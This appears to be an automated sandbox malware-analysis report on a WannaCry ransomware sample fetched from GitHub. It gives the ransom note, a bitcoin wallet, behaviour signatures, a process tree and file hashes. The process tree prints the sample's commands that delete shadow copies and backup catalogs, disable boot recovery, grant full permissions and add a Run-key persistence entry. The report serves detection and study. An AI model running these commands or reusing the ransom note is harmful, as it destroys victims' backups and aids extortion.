Analysis

  • max time kernel
    319s
  • max time network
    284s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-07-2024 17:36

General

  • Target

    https://github.com/limiteci/WannaCry

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 7 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/limiteci/WannaCry
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb2e0446f8,0x7ffb2e044708,0x7ffb2e044718
      2⤵
        PID:2508
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        2⤵
          PID:1224
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2372
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
          2⤵
            PID:4372
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
            2⤵
              PID:3152
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
              2⤵
                PID:4416
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
                2⤵
                  PID:3804
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1632
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
                  2⤵
                    PID:4308
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
                    2⤵
                      PID:4040
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
                      2⤵
                        PID:4576
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
                        2⤵
                          PID:5020
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5520 /prefetch:8
                          2⤵
                            PID:968
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
                            2⤵
                              PID:4496
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 /prefetch:8
                              2⤵
                                PID:4404
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4404
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11563352503975095551,11307427240676064515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
                                2⤵
                                  PID:4564
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:2420
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:2936
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:4400
                                    • C:\Users\Admin\Downloads\WannaCry.EXE
                                      "C:\Users\Admin\Downloads\WannaCry.EXE"
                                      1⤵
                                      • Drops startup file
                                      • Executes dropped EXE
                                      • Sets desktop wallpaper using registry
                                      • System Location Discovery: System Language Discovery
                                      PID:4976
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib +h .
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        • Views/modifies file attributes
                                        PID:3408
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls . /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:1504
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:3868
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c 230831721756294.bat
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2308
                                        • C:\Windows\SysWOW64\cscript.exe
                                          cscript.exe //nologo m.vbs
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4220
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib +h +s F:\$RECYCLE
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        • Views/modifies file attributes
                                        PID:448
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4416
                                        • C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
                                          TaskData\Tor\taskhsvc.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2192
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c start /b @[email protected] vs
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2888
                                        • C:\Users\Admin\Downloads\@[email protected]
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of SetWindowsHookEx
                                          PID:8
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4100
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              wmic shadowcopy delete
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3444
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1668
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1512
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • Sets desktop wallpaper using registry
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3452
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "jfugzgoryzqa991" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1612
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "jfugzgoryzqa991" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
                                          3⤵
                                          • Adds Run key to start application
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:2948
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1928
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4880
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3260
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4000
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3152
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4312
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2976
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1072
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4304
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2792
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3712
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4776
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1220
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2960
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1208
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4372
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3084
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:3152
                                      • C:\Users\Admin\Downloads\taskse.exe
                                        taskse.exe C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4980
                                      • C:\Users\Admin\Downloads\@[email protected]
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3516
                                      • C:\Users\Admin\Downloads\taskdl.exe
                                        taskdl.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4652
                                    • C:\Windows\system32\vssvc.exe
                                      C:\Windows\system32\vssvc.exe
                                      1⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4924

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      584971c8ba88c824fd51a05dddb45a98

                                      SHA1

                                      b7c9489b4427652a9cdd754d1c1b6ac4034be421

                                      SHA256

                                      e2d8de6c2323bbb3863ec50843d9b58a22e911fd626d31430658b9ea942cd307

                                      SHA512

                                      5dbf1a4631a04d1149d8fab2b8e0e43ccd97b7212de43b961b9128a8bf03329164fdeb480154a8ffea5835f28417a7d2b115b8bf8d578d00b13c3682aa5ca726

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      b28ef7d9f6d74f055cc49876767c886c

                                      SHA1

                                      d6b3267f36c340979f8fc3e012fdd02c468740bf

                                      SHA256

                                      fa6804456884789f4bdf9c3f5a4a8f29e0ededde149c4384072f3d8cc85bcc37

                                      SHA512

                                      491f893c8f765e5d629bce8dd5067cef4e2ebc558d43bfb05e358bca43e1a66ee1285519bc266fd0ff5b5e09769a56077b62ac55fa8797c1edf6205843356e75

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                      Filesize

                                      2KB

                                      MD5

                                      ef6fcfee678d19338601b532e0bba058

                                      SHA1

                                      95ba3f1d9eb6fb1813c24cdc47ef3585b7d501d0

                                      SHA256

                                      893a45726042340ad1541d78dd6fbaa859b48074e4c4fde1261e5afb5db103ca

                                      SHA512

                                      d7de3bf4f218724037190b32388a22d821237a4bac60c1eb3d98d721359bc5bbcc165bf191319b7663689cd38a9844c241ba414b10fbc025c1d022e9814b9a91

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                      Filesize

                                      663B

                                      MD5

                                      6372a9b876ce85f0d4611878dfaf38c7

                                      SHA1

                                      5ff0648b667a0448367638e0ff5f6c78745ff3df

                                      SHA256

                                      1eddfdd4c353f131a050b7762e3639f7fde6ec7a3252950a20c9896e69d320ab

                                      SHA512

                                      cadb00e2a8d62023fa9f005b4202b4c233ebe3639c530ae77b84e63484cc267b66724f12cc3bcf119ccc4fa0575883340de9bad3f9271379e3b6a7819a0d8bb1

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      5KB

                                      MD5

                                      4ef85e8c735c609501f2f4c08dc0c6b4

                                      SHA1

                                      1129fb7bca96314d8105a52d0a10c23692d78fe0

                                      SHA256

                                      e1b13ce6db53b183cb3d090e9fdda75acb2c18cef352c16763e48b72a87a9e09

                                      SHA512

                                      6aff34cc60a3cf7a3d8d38a18ca71f39536b0b6d7f8ab8fc5545a55ea5237dd4c2cc454586eac27cbe44adc6d9225574f7d9bc3cd0c78814058b9bf22b54b2b5

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      91b9f6cd799d55eff2a623241cbabaa0

                                      SHA1

                                      754a5da8bfb121763c971c62ca799711dbe5f35e

                                      SHA256

                                      76bc5d05bbf3a65f195f384b89f4b8a63d15c553699bfd854c58812299d3971b

                                      SHA512

                                      986331185f7f58a49d4d7403e61afd7596274bb2334006d742ca4e0b3ab6049d2de2acd6b0f59add15942eb83cf91a8661d7eb9c6b75a8a6f8fc4264ede654ea

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      6e03439623e3662ff9ed3b70fede775e

                                      SHA1

                                      c24d8cf581936448e5baf43231e23131384d90ce

                                      SHA256

                                      d016be623ac68bd3004015bb5650b5d217050ef558f0e641502f54b743a09fbc

                                      SHA512

                                      fd45938318dc2ed06e10cce5f7ce415ca33fa834b8b760ec11955594cd5452b0873cae191af42bbff5dedf03951bebec9f79146943d919c18370ee972118bf64

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      77cc1ad2b65e9819a5b2cd9f5a6ddc1f

                                      SHA1

                                      bfad077815ab077d18502d7a75fdf48e06157baf

                                      SHA256

                                      449e2d798f31f5320bd94fc9433f3818693e9e95def80160d52fb880349aae47

                                      SHA512

                                      306fabfb29941347b7d3e982d0e0a287de4edd5f6df197d0afec7ce08923a6bfc67ea3c9b383783a62d9cac94a9ed63236f96611ddfd25a909be105548f378c4

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                      Filesize

                                      1KB

                                      MD5

                                      91182e46688f8e74c0534b3bd79b88cc

                                      SHA1

                                      143fea4bc3f0135799130dcf3b6c111882e676fb

                                      SHA256

                                      aca951094c479387c6ac8981f6f25d66708e403a51db3a4abed56539d2df8de9

                                      SHA512

                                      81563e84db160b5092f3ba445dab0c0ba6a30d6f948a44b5697636f3a033ca6508dea92e656f8023dacfc8270f8755112039dee661ec3f6ccca48151d15b35d6

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580fe9.TMP

                                      Filesize

                                      1KB

                                      MD5

                                      2bf6be33b9b32e15bed66ac5e7df0acd

                                      SHA1

                                      37fb22d4aaacabce64ff2aac195b4bcff46f0d08

                                      SHA256

                                      d371b1ec68f82431937c9c991ff9af3d836c6fef919afe9563ac755019a509d1

                                      SHA512

                                      8a3edcc025694e3b306d90cbed2278c9264a1c801dcb20a92aabf90a963141ecfbab5f67301b0e2abaecd76cd457d684a84e67298a62ff813ed1626d853559ad

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      6752a1d65b201c13b62ea44016eb221f

                                      SHA1

                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                      SHA256

                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                      SHA512

                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                      Filesize

                                      72KB

                                      MD5

                                      efbbf151e079e181bca29da0aea4ee6d

                                      SHA1

                                      0185f4119bbcbffd4fe58026042c502e9913d033

                                      SHA256

                                      2cec8b6c0c9bbf7341e7c8aca5b4d019d8c1734b40a4ee1eaea5375be537de68

                                      SHA512

                                      35177a5c04f8cf9e03d6c56f1f6c2400d739dfc791cd41df6ce9992ae16d28b250aefc2ef36ac5a402f62bc30cbbc2e8e22de73d8e369f96968720454a112d15

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      11KB

                                      MD5

                                      466fd13849a19c5065fb79cde303697b

                                      SHA1

                                      f6a313ef5c8ad892441890bc75f1faae976318b4

                                      SHA256

                                      71c551a9c07c83090183303b077a6f00327d56e783996d4810fb9e38fe67b2b2

                                      SHA512

                                      85fd01e19bbbc94a9d8bbf3bfb76e6e4ea1533ee6c83b6397f2b4ae644db7af99174d65a8fcb1eff337b0fc77dbc6b6c0ba52ecdf31f1645560c9416ab7313ba

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      11KB

                                      MD5

                                      761d86b96c7634faa0f68a3f0751fcfa

                                      SHA1

                                      a69d4a087c0eb0cc3e80e6751d2a8fd1da8f3a52

                                      SHA256

                                      ddc1f74be04671386fd2cb4b1e915d80c6ff7f65e455919c1559f30b294ee18d

                                      SHA512

                                      7bf6a510e9343f258b0effd56a151dbde328e4edee7a2de8a0b6df53a3caf71c3893023a70e1f3abad732684ed13d85fcdd9e34daba71131d14b4dbb323db465

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      11KB

                                      MD5

                                      b181232a6469514a4679b0fdc3702c5c

                                      SHA1

                                      438fbb1c84a0538ef084eae02820022d6031852a

                                      SHA256

                                      ab3c98c02f3cc6b225834da7b63c7aafb2d6804b5602f0e43b0b42f8b90f702d

                                      SHA512

                                      2650662cf0733c28e60b9bafada68e324bb9b65027b614f1a813dd952cde83c8a4a470939597ea911bf13ff5b9bb6a8a90ff90335f4cf6178806265bfcd388a1

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

                                      Filesize

                                      4B

                                      MD5

                                      d84b3f1fecf05f5b4856e563ac8b7ddc

                                      SHA1

                                      cc7a5281db74bfa66234a182e920f29c84f01667

                                      SHA256

                                      5754b25dc8c7c538a308012e736b28468383ee12e54dde97f6654c4f46efd76d

                                      SHA512

